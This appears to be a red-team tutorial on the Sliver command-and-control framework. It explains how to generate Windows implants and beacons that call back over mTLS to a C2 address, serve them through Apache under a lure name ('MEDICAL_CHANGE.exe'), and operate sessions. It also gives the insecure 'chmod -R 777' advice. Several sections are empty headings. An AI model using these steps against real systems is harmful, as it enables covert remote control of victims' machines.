Sliver
Installation
Assuming
/usr/local/bin/
is in your path, your sliver server should be available in the shell assliver-server
and the client assliver
.
Prepare a delivery method
On your C2 server, run systemctl start apache2
to start a web server. You can now copy the implants you generate into the folder /var/www/html
and Apache will serve them. To allow any system user to put a payload their, you can run chmod -R 777 /var/www/html
.
Generating the implant
Implant generation happens on the C2 server with the generate
command. Connect to it and run help generate
to read the extensive help page and learn about all the flags. Here is a selection of the most important flags for now:
--mtls 192.168.122.111
: Specifies that the implant should connect to the Sliver server using a mutually authenticated TLS connection. Other options would be--wg
for WireGuard,--http
for HTTP(S) connections or--dns
for DNS-based C2.--os windows
: specifies that we want to run the implant on Windows (which is the default, so we could omit this one). MacOS and Linux are also supported.--arch amd64
" specifies that we want a 64-bit implant (also the default, could be omitted). Use--arch 386
for a 32-bit one.--format exe
: specifies that we want an executable file (again the default). Other options are--format shared
for dynamic libraries,--format service
for a Windows service binary (can be used with thepsexec
command) andshellcode
(only windows).--save /var/www/html/
: specifies the directory to save the binary to. I like to use the Apache web root.
Fix Permissions
The file /var/www/html/MEDICAL_CHANGE.exe
will not be owned by the Apache system user and has very restrictive file system permissions. To make it accessible for Apache, run sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe
.
Start Listener
Now start the mTLS listener on the C2 server using the mtls
command. By default, it starts the listener on port 8888. You can view your listeners with the jobs
command:
Transfer Binary to Target
Execute The Binary
If all is successful you will see a new session opened
Using a session
You can use your session with the use
command. Just type it, hit enter, and an interactive prompt will appear that allows to select a session. Hit enter again and your prompt changes to the implant name, which was MEDICAL_CHANGE
in my case. The session is now active and ready to accept your commands. With info
, you can get more information about the implant:
Sliver implants supports several commands. You can get a full list with help
. Features include file system exploration, file up- and downloads, port forwarding, taking screenshots and much more.
Kill Session
Kill Jobs
To kill your listener
Generating Beaconing implant
Generating a beacon implant is very similar to session implant generation. You use the generate beacon
command. Learn all about the flags with help generate beacon
. Aside from all the flags discussed above, relevant beacon flags are:
--seconds 5
: specify that the beacon should contact the C2 server every 5 seconds. You could alternatively use--minutes
,--hours
or--days
.--jitter 3
: specify that an additional random delay of up to 3 seconds should be added to the 5 seconds interval.
This is how I generated the beacon:
Sliver Survey
Execute the following commands in order upon session opening
After this general survey, decide if you want/need (opsec) to migrate to a new process or not.
Last updated